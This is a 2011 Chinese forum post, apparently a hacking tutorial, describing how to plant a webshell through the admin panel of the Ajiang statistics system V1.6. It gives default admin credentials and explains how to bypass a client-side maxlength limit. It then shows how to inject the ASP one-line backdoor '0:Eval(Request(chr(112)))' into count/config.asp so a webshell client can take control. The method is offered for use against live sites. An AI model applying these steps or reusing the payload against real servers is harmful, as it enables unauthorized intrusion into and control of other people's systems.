爵嘛 發表於 2011-3-31 22:35:47

阿江统计系统V1.6后台拿SHELL的方法

<p align="left">无奈到了自己这里今天下午又碰到个一样的站 纠结&middot;&middot;&middot;</p>
<p align="left">不多说了 首先感谢小帆同学 猪猪同学对程序代码的分析&middot;(我自己硬是整了半个小时没整出来利用方法&middot;)</p>
<p align="left"><img onmousewheel="return bbimg(this)" border="0" alt="" src="https://img.jbzj.com/do/uploads/allimg/110331/2236330.jpg" width="560" onload="resizepic(this)" height="232" /></p>
<p align="left">此后台默认的账号密码是 admin admin ,&nbsp;&nbsp;ITlearner&nbsp;&nbsp;ITlearner</p>
<p align="left">先进后台</p>
<p align="left"><img onmousewheel="return bbimg(this)" border="0" alt="" src="https://img.jbzj.com/do/uploads/allimg/110331/2236331.jpg" width="600" onload="resizepic(this)" height="576" /></p>
<p align="left">来到修改配置界面 保存源文件到本地</p>
<p align="left">本地打开源文件 找到原文章访问量 把maxlength=&quot;10 修改为 maxlength=&quot;100&nbsp;&nbsp;下边是修改后的截图</p>
<p align="left"><img onmousewheel="return bbimg(this)" border="0" alt="" src="https://img.jbzj.com/do/uploads/allimg/110331/2236332.jpg" width="593" onload="resizepic(this)" height="65" /></p>
<p align="left">然后在本地文件修改action地址 例如IE 中的提交地址是upload/2011/1/201101071923425208.jpg&quot; width=&quot;581&quot; onload=&quot;resizepic(this)&quot; height=&quot;50&quot; alt=&quot;&quot; /&gt;</p>
<p align="left">然后保存文件 用IE 打开 在网站访问量地址后写入&nbsp;&nbsp;0:Eval(Request(chr(112)))</p>
<p align="left"><img onmousewheel="return bbimg(this)" border="0" alt="" src="https://img.jbzj.com/do/uploads/allimg/110331/2236333.jpg" width="510" onload="resizepic(this)" height="64" />&nbsp;</p>
<p align="left">这个一句话的密码是P&nbsp;&nbsp;点击修改 一句话就被插到了 count/config.asp 这个文件了 打开一句话客户端就可以连接了</p>
<p align="left"><img onmousewheel="return bbimg(this)" border="0" alt="" src="https://img.jbzj.com/do/uploads/allimg/110331/2236334.jpg" width="561" onload="resizepic(this)" height="297" /></p>
<p align="left">只是个自己积累的小小的过程 对于网上关于阿江统计拿SHELL的方法我也测试了很多 但是没几个能成功的 所以专门写了这个文章出来 其实就是本地修改下字节 因为源程序中限制了写入的字节数 没有什么技术含量 不要骂我&middot;&middot;&middot;</p>
<p>文章作者:冰鱼</p>
頁: [1]
查看完整版本: 阿江统计系统V1.6后台拿SHELL的方法